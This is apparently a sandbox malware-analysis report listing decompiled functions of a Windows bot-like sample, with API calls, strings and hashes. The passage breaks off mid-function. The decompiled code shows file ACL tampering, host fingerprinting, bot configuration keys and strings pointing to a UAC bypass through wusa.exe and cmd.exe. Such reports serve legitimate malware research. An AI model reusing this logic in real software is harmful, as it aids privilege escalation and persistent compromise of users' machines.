                                                                                • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B211 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0040ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}





































                                                                                0x0040b225
                                                                                0x0040b22c
                                                                                0x0040b233
                                                                                0x0040b23a
                                                                                0x0040b241
                                                                                0x0040b248
                                                                                0x0040b24f
                                                                                0x0040b256
                                                                                0x0040b25d
                                                                                0x0040b264
                                                                                0x0040b26b
                                                                                0x0040b272
                                                                                0x0040b279
                                                                                0x0040b280
                                                                                0x0040b287
                                                                                0x0040b28e
                                                                                0x0040b295
                                                                                0x0040b29c
                                                                                0x0040b2a3
                                                                                0x0040b2ad
                                                                                0x0040b2c2
                                                                                0x0040b2d0
                                                                                0x0040b2af
                                                                                0x0040b2b3
                                                                                0x0040b2b3
                                                                                0x0040b2d2
                                                                                0x0040b2d7
                                                                                0x0040b2e1
                                                                                0x0040b2e7
                                                                                0x0040b2f0
                                                                                0x0040b306
                                                                                0x0040b30c
                                                                                0x0040b30f
                                                                                0x0040b2f2
                                                                                0x0040b2f4
                                                                                0x0040b2fa
                                                                                0x0040b2fd
                                                                                0x0040b2fd
                                                                                0x0040b31a
                                                                                0x0040b31a
                                                                                0x0040b323
                                                                                0x0040b329
                                                                                0x0040b32f
                                                                                0x0040b338
                                                                                0x0040b33a
                                                                                0x0040b33a
                                                                                0x0040b33d
                                                                                0x0040b341
                                                                                0x0040b344
                                                                                0x0040b34b
                                                                                0x0040b34f
                                                                                0x0040b350
                                                                                0x0040b350
                                                                                0x0040b358
                                                                                0x0040b35d
                                                                                0x0040b35d
                                                                                0x0040b366
                                                                                0x0040b36a
                                                                                0x0040b36b
                                                                                0x0040b36b
                                                                                0x0040b371
                                                                                0x0040b376
                                                                                0x0040b378
                                                                                0x0040b378
                                                                                0x0040b37f
                                                                                0x0040b380
                                                                                0x0040b3c4

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                • wsprintfA.USER32 ref: 0040B3B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                • API String ID: 766114626-2976066047
                                                                                • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407809 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E00407809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				struct _ACL* _t110;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				if(GetUserNameA( &_v384,  &_v36) == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
					goto L42;
				} else {
					if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
						_v36 = 0x80;
						_v40 = 0x80;
						if(EqualSid( &_v128, _v16) == 0) {
							_v28 = 1;
							_t155 = LocalAlloc(0x40, 0x14);
							if(_t155 != 0) {
								LocalFree(_t155);
							}
						}
					}
					_v24 = _t141;
					if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
						L41:
						goto L42;
					}
					_t110 = _v20;
					if(_t110 == _t141) {
						goto L41;
					}
					_v8 = _v8 & _t141;
					if(0 >= _t110->AceCount) {
						goto L41;
					} else {
						goto L13;
					}
					do {
						L13:
						if(GetAce(_t110, _v8,  &_v12) == 0) {
							L32:
							_v8 = _v8 + 1;
							goto L33;
						}
						_t153 = 0;
						_v16 = _v12 + 8;
						if(_t141 <= 0) {
							L19:
							if(_t141 < 0x20) {
								 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
								_t141 = _t141 + 1;
							}
							_t120 = EqualSid( &_v128, _v16);
							_t146 = _v12;
							if(_t120 == 0) {
								_t121 = 0x1200a8;
							} else {
								asm("sbb eax, eax");
								_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
							}
							if( *((intOrPtr*)(_t146 + 4)) != _t121) {
								 *((intOrPtr*)(_t146 + 4)) = _t121;
								_t146 = _v12;
								_v24 = 1;
							}
							if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
								 *_t146 = 0;
								_t66 = _v16 + 8; // 0xc8685f74
								_t123 =  *_t66;
								if(_t123 != 0) {
									 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
								} else {
									 *((char*)(_v12 + 1)) = 0xb;
								}
								_v24 = 1;
							}
							goto L32;
						}
						while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
							_t153 = _t153 + 1;
							if(_t153 < _t141) {
								continue;
							}
							break;
						}
						if(_t153 >= _t141) {
							goto L19;
						}
						DeleteAce(_v20, _v8);
						_v24 = 1;
						L33:
						_t110 = _v20;
					} while (_v8 < (_t110->AceCount & 0x0000ffff));
					if(_v24 != 0) {
						_v28 = 1;
						_t154 = LocalAlloc(0x40, 0x14);
						if(_t154 != 0) {
							if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
								_v28 = 1;
							}
							LocalFree(_t154);
						}
					}
					goto L41;
				}
			}































                                                                                0x0040781e
                                                                                0x00407826
                                                                                0x00407829
                                                                                0x0040782c
                                                                                0x00407837
                                                                                0x00407a8e
                                                                                0x00407a94
                                                                                0x00407a94
                                                                                0x0040785c
                                                                                0x00407863
                                                                                0x0040786e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040787e
                                                                                0x0040788b
                                                                                0x004078a2
                                                                                0x00000000
                                                                                0x004078a8
                                                                                0x004078c3
                                                                                0x004078cc
                                                                                0x004078cf
                                                                                0x004078da
                                                                                0x004078e0
                                                                                0x004078e9
                                                                                0x004078ed
                                                                                0x00407917
                                                                                0x00407917
                                                                                0x004078ed
                                                                                0x004078da
                                                                                0x00407930
                                                                                0x0040793b
                                                                                0x00407a8d
                                                                                0x00000000
                                                                                0x00407a8d
                                                                                0x00407941
                                                                                0x00407946
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040794c
                                                                                0x00407955
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040795b
                                                                                0x0040795b
                                                                                0x0040796b
                                                                                0x00407a2a
                                                                                0x00407a2a
                                                                                0x00000000
                                                                                0x00407a2a
                                                                                0x00407977
                                                                                0x00407979
                                                                                0x0040797e
                                                                                0x004079ae
                                                                                0x004079b1
                                                                                0x004079b6
                                                                                0x004079bd
                                                                                0x004079bd
                                                                                0x004079c5
                                                                                0x004079cb
                                                                                0x004079d0
                                                                                0x004079e5
                                                                                0x004079d2
                                                                                0x004079d7
                                                                                0x004079de
                                                                                0x004079de
                                                                                0x004079ed
                                                                                0x004079ef
                                                                                0x004079f2
                                                                                0x004079f5
                                                                                0x004079f5
                                                                                0x004079fb
                                                                                0x00407a03
                                                                                0x00407a09
                                                                                0x00407a09
                                                                                0x00407a0e
                                                                                0x00407a24
                                                                                0x00407a10
                                                                                0x00407a13
                                                                                0x00407a13
                                                                                0x00407a27
                                                                                0x00407a27
                                                                                0x00000000
                                                                                0x004079fb
                                                                                0x00407980
                                                                                0x00407994
                                                                                0x00407997
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407997
                                                                                0x0040799b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004079a3
                                                                                0x004079a9
                                                                                0x00407a2d
                                                                                0x00407a2d
                                                                                0x00407a34
                                                                                0x00407a41
                                                                                0x00407a47
                                                                                0x00407a50
                                                                                0x00407a54
                                                                                0x00407a60
                                                                                0x00407a83
                                                                                0x00407a83
                                                                                0x00407a87
                                                                                0x00407a87
                                                                                0x00407a54
                                                                                0x00000000
                                                                                0x00407a41

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 0040782F
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00407878
                                                                                • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
                                                                                • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407917
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00407963
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
                                                                                • DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
                                                                                • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407A87
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                • String ID: D
                                                                                • API String ID: 3722657555-2746444292
                                                                                • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
                                                                                • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401280 Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 417stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(?), ref: 0040139A
                                                                                • lstrlenW.KERNEL32(-00000003), ref: 00401571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShelllstrlen
                                                                                • String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
                                                                                • API String ID: 1628651668-1839596206
                                                                                • Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                • Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
                                                                                • Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                • Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401D96 Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 205libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E00401D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0040EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192);
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0040DF70(1, "work_srv");
					E0040DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0040EA84(1, _t104, _t92, 0);
				_t93 = 0;
				_t63 = E0040E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				if(E0040199C(_t63) == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0040E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0040F04E(_t93);
					E0040EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0040E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_v200 = E00401B71();
					E0040EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
				_t67 = E0040E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_v200 = E00401BDF();
					E0040EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x61;
				_t96 = E0040E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 4;
					E0040EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
				if( *0x41201d == 0) {
					if( *0x41201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E00406EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x412110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}


























                                                                                0x00401d9f
                                                                                0x00401da9
                                                                                0x00401daf
                                                                                0x00401db4
                                                                                0x00401dbc
                                                                                0x00401dbe
                                                                                0x00401dce
                                                                                0x00401de0
                                                                                0x00401dd0
                                                                                0x00401ddb
                                                                                0x00401ddb
                                                                                0x00401de8
                                                                                0x00401dfc
                                                                                0x00401dff
                                                                                0x00401e10
                                                                                0x00401e14
                                                                                0x00401e22
                                                                                0x00401e22
                                                                                0x00401e2a
                                                                                0x00401e34
                                                                                0x00401e38
                                                                                0x00401e3e
                                                                                0x00401e46
                                                                                0x00401e4e
                                                                                0x00401e51
                                                                                0x00401e54
                                                                                0x00401e59
                                                                                0x00401e64
                                                                                0x00401e67
                                                                                0x00401e72
                                                                                0x00401e77
                                                                                0x00401e77
                                                                                0x00401e7f
                                                                                0x00401e84
                                                                                0x00401e8e
                                                                                0x00401e93
                                                                                0x00401e96
                                                                                0x00401ea0
                                                                                0x00401ea8
                                                                                0x00401ea2
                                                                                0x00401ea2
                                                                                0x00401ea2
                                                                                0x00401eb4
                                                                                0x00401eb9
                                                                                0x00401ebc
                                                                                0x00401ec1
                                                                                0x00401ec9
                                                                                0x00401ed3
                                                                                0x00401ed8
                                                                                0x00401edb
                                                                                0x00401ede
                                                                                0x00401ede
                                                                                0x00401ee1
                                                                                0x00401ee9
                                                                                0x00401eee
                                                                                0x00401ef1
                                                                                0x00401ef6
                                                                                0x00401f01
                                                                                0x00401f05
                                                                                0x00401f0e
                                                                                0x00401f11
                                                                                0x00401f11
                                                                                0x00401f16
                                                                                0x00401f1e
                                                                                0x00401f23
                                                                                0x00401f26
                                                                                0x00401f2b
                                                                                0x00401f36
                                                                                0x00401f3a
                                                                                0x00401f43
                                                                                0x00401f46
                                                                                0x00401f46
                                                                                0x00401f52
                                                                                0x00401f5e
                                                                                0x00401f65
                                                                                0x00401f69
                                                                                0x00401f72
                                                                                0x00401f77
                                                                                0x00401f7a
                                                                                0x00401f82
                                                                                0x00401f8c
                                                                                0x00401f9a
                                                                                0x00401fb7
                                                                                0x00401f9c
                                                                                0x00401fa3
                                                                                0x00401fae
                                                                                0x00401fa5
                                                                                0x00401fa5
                                                                                0x00401fa5
                                                                                0x00401fa3
                                                                                0x00401f8e
                                                                                0x00401f8e
                                                                                0x00401f8e
                                                                                0x00401fc0
                                                                                0x00401fc2
                                                                                0x00401fc2
                                                                                0x00401fd6
                                                                                0x00401fd9
                                                                                0x00401fde
                                                                                0x00401fea

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 00401DC6
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00401DE8
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401E0A
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00401E1B
                                                                                • GetTickCount.KERNEL32 ref: 00401FC9
                                                                                  • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                • API String ID: 4207808166-1381319158
                                                                                • Opcode ID: 174b5597e53b85571f1c32fd197fd8fbccf035cef4f3f42155ce14a49909b689
                                                                                • Instruction ID: 4bec38004d2b42250697577447cb56bf839fa837f468b717733c20bdb0386e2e
                                                                                • Opcode Fuzzy Hash: 174b5597e53b85571f1c32fd197fd8fbccf035cef4f3f42155ce14a49909b689
                                                                                • Instruction Fuzzy Hash: A151FAB05003446FD330AF768C85F67BAECEB84708F04493FF955A2292D7BDA94487A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402A62 Relevance: 27.2, APIs: 18, Instructions: 194networkmemoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E00402A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00402923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
